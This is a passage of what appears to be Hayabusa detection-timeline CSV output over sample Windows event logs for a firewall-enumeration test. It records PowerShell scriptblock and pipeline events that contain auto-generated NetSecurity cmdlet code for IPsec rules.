Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } e,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"lse { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.770 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Show-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object 